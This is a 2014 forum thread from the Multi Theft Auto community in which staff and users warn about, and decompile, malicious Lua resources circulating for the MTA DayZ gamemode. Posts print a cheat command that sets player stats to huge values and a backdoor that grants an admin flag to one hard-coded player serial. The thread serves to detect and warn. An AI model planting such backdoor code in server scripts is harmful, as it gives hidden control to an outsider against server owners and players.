MTA Team ccw Posted May 3, 2014 MTA Team Posted May 3, 2014 It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation. If you are an owner of a server running the MTA DayZ gamemode, then you must update your MTA server to the latest build (1.3.5-9.06371) Linux binaries from here: http://linux.multitheftauto.com/ Windows binaries from here: http://www.mtasa.com/ If you play on a server running the MTA DayZ gamemode, you can check the server version by using the command sver in the client console. If the server build is below 6371, nag the owner to update!
Quited Posted May 3, 2014 Posted May 3, 2014 what malicious scripts ? do you mean cheats ? , or script that using redirectPlayer to redirect players in other servers ? and what this serial ? AddBlockedFileReason( "[b][color=#FF0000]5A5FD6E08D503A125C81BA26594B416A[/color][/b]", "Malicious" ); * From CResourceManager.cpp File.
Woovie Posted May 3, 2014 Posted May 3, 2014 what malicious scripts ?do you mean cheats ? , or script that using redirectPlayer to redirect players in other servers ? and what this serial ? AddBlockedFileReason( "[b][color=#FF0000]5A5FD6E08D503A125C81BA26594B416A[/color][/b]", "Malicious" ); * From CResourceManager.cpp File. That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious" The script had functions that did a range of things, from giving items to player teleporting, but the only visible function was one that gave you a list of cars. It was a popular script for MTA DayZ servers so that admins could keep track of stuff.
Lawliet Posted May 3, 2014 Posted May 3, 2014 It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation. What exactly does "script" mean in this regard? Is it a resource you can enable/disable at any time or is it a third party program which exclusively targets MTA DayZ? Also, what exactly is said script trying to accomplish? Do I have to worry about compromised passwords, usernames, resources etc? Is this announcement an extension to this post by Woovie? EDIT: I see that Woovie has already answered my questions. We never used that particular resource, so we don't have to worry about anything...but rest assured, we will still update to the latest version once it's available for us.
Quited Posted May 3, 2014 Posted May 3, 2014 (edited) That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious ok , i have most serials doing something bad in MTA and this serial ? 5A5FD6E08D503A125C81BA26594B416A it is in blacklist ? Edited May 3, 2014 by Guest
Woovie Posted May 3, 2014 Posted May 3, 2014 Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code.
MTA Team Dutchman101 Posted May 3, 2014 MTA Team Posted May 3, 2014 Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code. It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it.
Quited Posted May 3, 2014 Posted May 3, 2014 It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it. ok , if somebody can upload malicious resources on community , he can upload more and more Even if get banned.
Woovie Posted May 3, 2014 Posted May 3, 2014 It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it. ok , if somebody can upload malicious resources on community , he can upload more and more Even if get banned. Can you just stop posting?
TheNormalnij Posted May 6, 2014 Posted May 6, 2014 http://pastebin.com/3uK5ixkG You can not monitor all malicious resources...
Gallagher Posted May 23, 2014 Posted May 23, 2014 Hello" I found this script mta dayz, it is compiled, and has a addcommandhandler the script, I think it can do harm to the server can check for me? https://dl.dropboxusercontent.com/s/6ga ... 1400759763
Jusonex Posted May 23, 2014 Posted May 23, 2014 Yep, looks like that: function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS)
Gallagher Posted May 23, 2014 Posted May 23, 2014 Yep, looks like that: function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS) I need to use this script, you could delete this scam and send me the file?
Jusonex Posted May 23, 2014 Posted May 23, 2014 That's the decompiled Lua script: function load() for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model) engineImportTXD(tex, _FORV_4_.model) mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model) engineReplaceModel(mod, _FORV_4_.model) txd = engineLoadTXD("mods/1.txd", 2726) engineImportTXD(txd, 2726) dff = engineLoadDFF("mods/1.dff", 2726) engineReplaceModel(dff, 2726) txd = engineLoadTXD("mods/2.txd", 2725) engineImportTXD(txd, 2725) dff = engineLoadDFF("mods/2.dff", 2725) engineReplaceModel(dff, 2725) txd = engineLoadTXD("mods/3.txd", 2644) engineImportTXD(txd, 2644) dff = engineLoadDFF("mods/3.dff", 2644) engineReplaceModel(dff, 2644) txd = engineLoadTXD("mods/4.txd", 2708) engineImportTXD(txd, 2708) dff = engineLoadDFF("mods/4.dff", 2708) engineReplaceModel(dff, 2708) txd = engineLoadTXD("mods/5.txd", 2571) engineImportTXD(txd, 2571) dff = engineLoadDFF("mods/5.dff", 2571) engineReplaceModel(dff, 2571) txd = engineLoadTXD("mods/6.txd", 2568) engineImportTXD(txd, 2568) dff = engineLoadDFF("mods/6.dff", 2568) engineReplaceModel(dff, 2568) txd = engineLoadTXD("mods/7.txd", 2565) engineImportTXD(txd, 2565) dff = engineLoadDFF("mods/7.dff", 2565) engineReplaceModel(dff, 2565) txd = engineLoadTXD("mods/8.txd", 2468) engineImportTXD(txd, 2468) dff = engineLoadDFF("mods/8.dff", 2468) engineReplaceModel(dff, 2468) txd = engineLoadTXD("mods/9.txd", 2562) engineImportTXD(txd, 2562) dff = engineLoadDFF("mods/9.dff", 2562) engineReplaceModel(dff, 2562) end end addEventHandler("onClientResourceStart", resourceRoot, function() setTimer(load, 1000, 1) end) function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS)
Gallagher Posted May 23, 2014 Posted May 23, 2014 That's the decompiled Lua script: function load() for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model) engineImportTXD(tex, _FORV_4_.model) mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model) engineReplaceModel(mod, _FORV_4_.model) txd = engineLoadTXD("mods/1.txd", 2726) engineImportTXD(txd, 2726) dff = engineLoadDFF("mods/1.dff", 2726) engineReplaceModel(dff, 2726) txd = engineLoadTXD("mods/2.txd", 2725) engineImportTXD(txd, 2725) dff = engineLoadDFF("mods/2.dff", 2725) engineReplaceModel(dff, 2725) txd = engineLoadTXD("mods/3.txd", 2644) engineImportTXD(txd, 2644) dff = engineLoadDFF("mods/3.dff", 2644) engineReplaceModel(dff, 2644) txd = engineLoadTXD("mods/4.txd", 2708) engineImportTXD(txd, 2708) dff = engineLoadDFF("mods/4.dff", 2708) engineReplaceModel(dff, 2708) txd = engineLoadTXD("mods/5.txd", 2571) engineImportTXD(txd, 2571) dff = engineLoadDFF("mods/5.dff", 2571) engineReplaceModel(dff, 2571) txd = engineLoadTXD("mods/6.txd", 2568) engineImportTXD(txd, 2568) dff = engineLoadDFF("mods/6.dff", 2568) engineReplaceModel(dff, 2568) txd = engineLoadTXD("mods/7.txd", 2565) engineImportTXD(txd, 2565) dff = engineLoadDFF("mods/7.dff", 2565) engineReplaceModel(dff, 2565) txd = engineLoadTXD("mods/8.txd", 2468) engineImportTXD(txd, 2468) dff = engineLoadDFF("mods/8.dff", 2468) engineReplaceModel(dff, 2468) txd = engineLoadTXD("mods/9.txd", 2562) engineImportTXD(txd, 2562) dff = engineLoadDFF("mods/9.dff", 2562) engineReplaceModel(dff, 2562) end end addEventHandler("onClientResourceStart", resourceRoot, function() setTimer(load, 1000, 1) end) function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS) thank you friend
StreetPunkRulez Posted June 4, 2014 Posted June 4, 2014 I heard there is other version of this hack with incluced bypass that detection method.
Woovie Posted June 4, 2014 Posted June 4, 2014 I heard there is other version of this hack with incluced bypass that detection method. 1. This isn't a hack, it's a resource... 2. They can't bypass our "detection" since it's a script. Any compiled script we can decompile to check for these types of issues.
Gallagher Posted June 20, 2014 Posted June 20, 2014 Hello! I use this resource on my server for dayz, but I think it has something malicious. can verify? https://mega.co.nz/#!nlB2gBQZ!u7Qr9JqZb ... bIVRWBw3Yg
Jusonex Posted June 21, 2014 Posted June 21, 2014 It contains a backdoor: function get(player) if getPlayerSerial(player) == "DFD1A04C59E7CB85FF672E4CC759F9F4" then setElementData(player, "adminn", true) else cancelEvent() end end addCommandHandler("neves768m", get) Apart from that it's very insecure (excessive usage of element datas etc.) so I wouldn't recommand you to use it on your server.
lopezloo Posted June 21, 2014 Posted June 21, 2014 Eh, guys like author of this script should be global banned by serial.
Jusonex Posted June 21, 2014 Posted June 21, 2014 Server: http://pastebin.com/L702uDts Client: http://pastebin.com/qkJbAw7s
Atton Posted July 20, 2014 Posted July 20, 2014 Yet another good reason to make encrypted work exclusively on one server http://pastebin.com/gBV2FHjW
MrBugsFive Posted February 7, 2015 Posted February 7, 2015 Hello? You Check Here Files ?? http://www.mediafire.com/download/iz2fu ... ves768.rar Pass: neves768.com !! Please Check is Secure !! (File Create By Neves768 What Banned/Blocked of Forum by Script Malicius !!) @Jusonex
Recommended Posts